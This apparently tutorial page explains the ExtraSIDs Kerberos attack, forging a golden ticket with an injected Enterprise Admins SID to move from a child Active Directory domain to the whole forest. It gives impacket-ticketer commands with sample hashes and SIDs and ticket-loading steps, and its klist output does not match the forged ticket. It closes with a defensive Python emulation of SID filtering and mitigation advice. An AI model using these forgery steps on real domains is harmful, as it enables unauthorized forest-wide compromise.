ExtraSIDs
The ExtraSIDs attack is a Kerberos-based privilege escalation technique that abuses the trust relationship between two Active Directory domains, typically a compromised child domain and its parent.
Using the KRBTGT hash of the compromised domain, the attacker forges a TGT (a golden ticket) and adds one more SID (Security Identifier) to it: a SID from the trusted domain, usually a high-privilege group such as Enterprise Admins (RID 519). This is done by populating the ExtraSids (SIDHistory) field of the ticket's PAC. Domain controllers in the trusted domain honour that field during ticket validation because parent/child trusts inside a forest are not subject to SID filtering, so the forged identity is treated as a member of the injected group.
The result is unauthorized access to critical resources in the trusted domain, including its domain controllers, and therefore full forest compromise.
# Forge the TGT for the target user (KRBTGT RC4/NT hash of the child domain, variant 1)
impacket-ticketer -nthash 12b792603f994d46906474202b20b5d4 -domain-sid S-1-5-21-3056178012-3972705859-491075245 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-141835440-519 -spn krbtgt/zsm.local x7331
# Forge the TGT for the target user (KRBTGT hash of the child domain, variant 2)
impacket-ticketer -nthash 0540fe51ddd618f42a66ef059ac36441 -domain-sid S-1-5-21-3056178012-3972705859-491075245 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-141835440-519 -spn krbtgt/zsm.local x7331
# Load the forged ticket into the current session
export KRB5CCNAME=./x7331.ccache
# Confirm the ticket's details
$ klist
Ticket cache: FILE:./tgt.ccache
Default principal: tgt@INTERNAL.ZSM.LOCAL
Valid starting       Expires              Service principal
06/13/2025 16:03:25  06/11/2035 16:03:25  krbtgt/zsm.local@INTERNAL.ZSM.LOCAL
	renew until 06/11/2035 16:03:25
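The defensive counterpart to the ticket above is SID filtering: on trusts where it is enforced (external and forest trusts), the receiving DC strips every SID in ExtraSids/SIDHistory whose domain part is not the issuing domain, which is exactly what neutralises this technique. The following added example (not part of the original page, and not Impacket or Microsoft code) emulates that decision in Python so the result can be checked offline. It takes the child domain SID and the extra SID from the ticketer command above as constructed input; the privileged-RID table is the standard set of well-known RIDs, and the same-domain user SID ending in 1105 is a made-up value used only to show an accepted entry.

```python
"""
Emulation of the SID-filtering check a domain controller applies to the
ExtraSids (SIDHistory) field of a cross-domain Kerberos ticket.
Added example; the SIDs below are taken from the page's ticketer command,
the RID 1105 user SID is constructed for illustration.
"""
import re
from dataclasses import dataclass

# Domain-style SID: S-1-5-21-<sub1>-<sub2>-<sub3>-<RID>
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")

# Well-known RIDs that map to highly privileged principals.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
    526: "Key Admins",
    527: "Enterprise Key Admins",
}


def split_sid(sid):
    """Return (domain_sid, rid) for a domain-style SID; raise ValueError otherwise."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    domain_sid = sid.rsplit("-", 1)[0]
    return domain_sid, int(m.group(1))


@dataclass
class Finding:
    sid: str
    reason: str


def filter_extra_sids(issuing_domain_sid, extra_sids):
    """
    Apply SID filtering to the ExtraSids of a ticket issued by issuing_domain_sid.
    Any SID whose domain portion differs from the issuing domain is dropped and
    reported; a dropped SID that resolves to a privileged RID is called out.
    Returns (accepted_sids, findings).
    """
    accepted, findings = [], []
    for sid in extra_sids:
        try:
            dom, rid = split_sid(sid)
        except ValueError:
            findings.append(Finding(sid, "malformed or non-domain SID"))
            continue
        if dom != issuing_domain_sid:
            reason = "foreign-domain SID in SIDHistory"
            if rid in PRIVILEGED_RIDS:
                reason += f", resolves to {PRIVILEGED_RIDS[rid]} (RID {rid})"
            findings.append(Finding(sid, reason))
            continue
        accepted.append(sid)
    return accepted, findings


if __name__ == "__main__":
    child_domain = "S-1-5-21-3056178012-3972705859-491075245"   # internal.zsm.local (from the page)
    ticket_extra_sids = [
        "S-1-5-21-2734290894-461713716-141835440-519",          # parent-domain Enterprise Admins (from the page)
        child_domain + "-1105",                                 # constructed same-domain user SID
    ]
    kept, alerts = filter_extra_sids(child_domain, ticket_extra_sids)
    print("accepted:", kept)
    for a in alerts:
        print("dropped :", a.sid, "->", a.reason)
```

Run as a script it drops the parent-domain RID 519 entry and keeps the same-domain one. The important caveat for this page is that parent/child trusts within one forest do not apply this filter, so the emulation shows what an external or forest trust would do; inside a forest the practical mitigations are protecting the child domain's KRBTGT secret and alerting on tickets or logon events that carry SIDHistory entries from another domain.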